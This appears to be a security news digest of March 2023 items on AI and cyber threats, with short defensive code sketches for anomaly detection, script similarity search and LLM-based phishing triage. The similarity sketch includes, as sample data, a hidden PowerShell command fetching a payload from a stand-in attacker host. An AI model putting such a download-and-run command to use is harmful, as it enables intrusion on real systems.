Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

March 2023

The New Face of Fraud: FTC Sheds Light on AI-Enhanced Family Emergency Scams

The Federal Trade Commission is alerting consumers to a more sophisticated family emergency scam that uses AI to imitate the voice of a "family member in distress." The FTC's alert opens: "You get a call. There's a panicked voice on the line. It's your grandson. He says he's in deep trouble — he wrecked the car and landed in jail. But you can help by sending money. You take a deep breath and think. You've heard about grandparent scams. But darn, it sounds just like him."

What Generative AI Means For Cybersecurity: Risk & Reward

In recent years, generative artificial intelligence (AI), especially large language models (LLMs) like ChatGPT, has revolutionized the fields of AI and natural language processing. From automating customer support to creating realistic chatbots, we rely on AI far more than many of us probably realize. The AI hype train reached full steam in the last several months, especially for cybersecurity use cases, with the release of a string of new AI-powered tools.

Artificial Intelligence Makes Phishing Text More Plausible

Cybersecurity experts continue to warn that advanced chatbots like ChatGPT are making it easier for cybercriminals to craft phishing emails with pristine spelling and grammar, the Guardian reports. Corey Thomas, CEO of Rapid7, stated: “Every hacker can now use AI that deals with all misspellings and poor grammar. The idea that you can rely on looking for bad grammar or spelling in order to spot a phishing attack is no longer the case.”

ChatGPT Suffered From a Major Data Breach Exposing Its Subscribers

ChatGPT is OpenAI's chatbot designed to simulate conversation with human users. The tool uses a large language model to produce realistic, believable responses. OpenAI offers a subscription service, ChatGPT Plus, which gives subscribers preferential access to the powerful AI system. Some of those subscribers were exposed in the first-ever ChatGPT data breach, which occurred in March of this year.

5 cyber threats that criminals can generate with the help of ChatGPT

ChatGPT, the public generative AI chatbot that came out in late November 2022, has raised legitimate concerns about its potential to amplify the severity and complexity of cyberthreats. In fact, as soon as OpenAI announced its release, many security experts predicted that it would only be a matter of time before attackers started using the chatbot to craft malware or augment phishing attacks.

How Can AI Predict Cybersecurity Incidents?

As technology becomes more prevalent in our lives, the risk of cybersecurity incidents is also increasing. Cybersecurity incidents can cause significant damage to organizations, including financial loss, reputational damage, and theft of sensitive data. Therefore, it is essential to have a robust cybersecurity system in place to protect against cyber-attacks. Artificial intelligence (AI) is one technology that can be used to predict cybersecurity incidents and mitigate their associated risks.
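
How such prediction works in practice varies widely, but many approaches boil down to learning what "normal" activity looks like and flagging deviations from it. The sketch below is a minimal, generic illustration of that idea using an unsupervised anomaly detector; the feature set and the numbers are hypothetical and are not drawn from any specific product or article.

```python
# Minimal sketch: flagging anomalous host activity with an unsupervised model.
# The features (logins, MB sent, failed auths) are hypothetical and only
# illustrate the general idea of ML-assisted incident prediction.
import numpy as np
from sklearn.ensemble import IsolationForest

# Toy "normal" telemetry: rows = hosts, columns = [logins, MB sent, failed auths]
baseline = np.array([
    [12, 300, 1],
    [10, 280, 0],
    [14, 350, 2],
    [11, 310, 1],
    [13, 290, 0],
])

model = IsolationForest(contamination=0.1, random_state=42)
model.fit(baseline)

# New observations: the second row shows exfiltration-like traffic volume
# and many failed logins, so it should be flagged as anomalous.
today = np.array([
    [12, 305, 1],
    [90, 9000, 40],
])

for row, verdict in zip(today, model.predict(today)):
    print(row, "->", "ANOMALY" if verdict == -1 else "normal")
```

In a real deployment, most of the work is in feature engineering and alert triage; a flagged host is a lead for an analyst, not a confirmed incident.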

CrowdStrike's Artificial Intelligence Tooling Uses Similarity Search to Analyze Script-Based Malware Attack Techniques

According to the AV-TEST Institute, more than 1 billion strains of malware have been created, and more than 500,000 new pieces of malware are detected every day. One of the main reasons for this rapid growth is that malware creators frequently reuse source code, modifying existing malware to meet the specific objectives of an attack campaign or to evade signature-based detection.
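
To make the idea of similarity search concrete, here is a generic sketch (not CrowdStrike's implementation) of why it defeats simple signature evasion: a lightly modified script still shares most of its character n-grams with the original, so their Jaccard similarity stays high even though an exact hash or signature match would fail. The script contents and the evil.example URL are made up for illustration.

```python
# Generic similarity-search sketch: compare scripts by character n-gram overlap.
# A tweaked variant of a known-bad script keeps most of its n-grams, so the
# similarity score stays high even when an exact signature no longer matches.
def ngrams(text: str, n: int = 4) -> set:
    return {text[i:i + n] for i in range(len(text) - n + 1)}

def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if a or b else 0.0

known_bad = "powershell -nop -w hidden Invoke-WebRequest http://evil.example/payload.ps1"
variant   = "powershell -nop -w hidden Invoke-WebRequest http://evil.example/stage2.ps1"
benign    = "Get-ChildItem C:\\Users | Sort-Object Length | Select-Object -First 10"

for name, script in [("variant", variant), ("benign", benign)]:
    score = jaccard(ngrams(known_bad), ngrams(script))
    print(f"{name}: similarity to known_bad = {score:.2f}")
```

A production system would replace raw n-grams with learned embeddings and an approximate nearest-neighbor index, but the underlying intuition is the same.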

ChatGPT: The Right Tool for the Job?

Since it was first released to the public late last year, ChatGPT has successfully captured the attention of many. OpenAI’s large language model chatbot is intriguing for a variety of reasons, not the least of which is the manner in which it responds to human users. ChatGPT’s language usage resembles that of an experienced professional. But while its responses are delivered with unshakeable confidence, the content is not always as impressive as the delivery.

Coffee Talk with SURGe: Oakland Ransomware Attack, BreachForums, Acropalypse Vulnerability, GPT-4

Grab a cup of coffee and join Ryan Kovar, Mick Baccio, and Audra Streetman for another episode of Coffee Talk with SURGe. The team from Splunk discusses the latest security news: Mick and Ryan share their takes on responding to zero-day vulnerabilities, and the trio also discusses GPT-4 and the future of generative AI.

AI Has Your Business Data

Some of the world’s largest tech companies, like Google and Microsoft, have embedded AI into their business productivity suites, with Microsoft going a step further and releasing AI Copilot for Power Apps, its low-code platform. The integration has raised concerns about how much power business users now have to connect business data to AI and grant access to it, decisions that can be made without oversight or control from IT.

Key Security AI Adoption Trends for 2023

It’s hard to go a day without some headline touting how generative AI is transforming the future of work. And this sentiment certainly rings true in the security industry as security operations centers (SOCs) continue to mature their security posture with automation so that they can protect their enterprise and customer data. But how are leaders and teams feeling about the progress of AI adoption and how the tools are being used?

The Risks of Using ChatGPT to Write Client-Side Code

Since OpenAI released its AI chatbot ChatGPT in November 2022, people from all over the internet have been vocal about the program. Whether you love this software or despise it, the bottom line seems to be that the technology behind ChatGPT isn’t going anywhere, at least not anytime soon. Those curious enough to try out this conversational AI software have found that their results are often varied.

Five worthy reads: Hello from the dark side – the nefarious nature of voice AI technology

Five worthy reads is a regular column on five noteworthy items we’ve discovered while researching trending and timeless topics. This week, we are exploring voice-activated AI technology that allows computers to comprehend and respond to human speech, while analyzing some of its drawbacks.

Getting Started on Governing AI Issues

Today we are going to keep looking at artificial intelligence and how corporations can get ahead of its risks. Our previous post on AI was primarily a list of potential risks that could run rings around your company if you’re not careful; so what steps can the board and senior executives take to prevent all that? Well, first things first: AI is a new technology.

Using ChatGPT to Improve Your Cybersecurity Posture

On November 30, 2022, ChatGPT shook the digital world, sending a tremor that rattled even the cybersecurity industry. Instead of responding in panic, a more sensible approach is to begin learning how to leverage the technology to streamline your workflow and sharpen your skills. In this post, we explain how ChatGPT can be used to improve your cybersecurity posture and data breach resilience.
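
As one small example of what that can look like, the sketch below asks OpenAI's chat completion API to triage a suspicious email for phishing indicators. The prompt wording, model choice, and sample email are illustrative assumptions, and, as the "AI Has Your Business Data" item above notes, nothing sensitive should be pasted into a third-party model; treat the output as an analyst aid, not a verdict.

```python
# Hypothetical sketch: asking an LLM to triage a suspicious email.
# Requires the `openai` package and an API key; the prompt, model name, and
# sample email are illustrative. Never paste confidential data into the prompt.
import os
import openai

openai.api_key = os.environ["OPENAI_API_KEY"]

suspicious_email = """Subject: Urgent: verify your payroll account
Your direct deposit has been suspended. Confirm your credentials within 24 hours:
http://payroll-update.example.com/login"""

response = openai.ChatCompletion.create(
    model="gpt-3.5-turbo",
    messages=[
        {"role": "system",
         "content": "You are a security analyst. List the phishing indicators "
                    "in the email and rate its risk as low, medium, or high."},
        {"role": "user", "content": suspicious_email},
    ],
)

print(response.choices[0].message["content"])
```

The same pattern extends to other posture-improving chores the post alludes to, such as drafting awareness training content or summarizing incident timelines, with a human reviewing everything the model produces.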

EP 22 - Deep Fakes, ChatGPT and Disinformation: Theresa Payton on Evolving Digital Threats (Part 2)

Today’s episode is part two of our conversation with former White House CIO, bestselling author and founder and CEO of Fortalice Solutions, Theresa Payton. If you missed part one, you can start here and go back to that episode. Or, you can start there and come back to this one – but you’re already here, so maybe just stick around?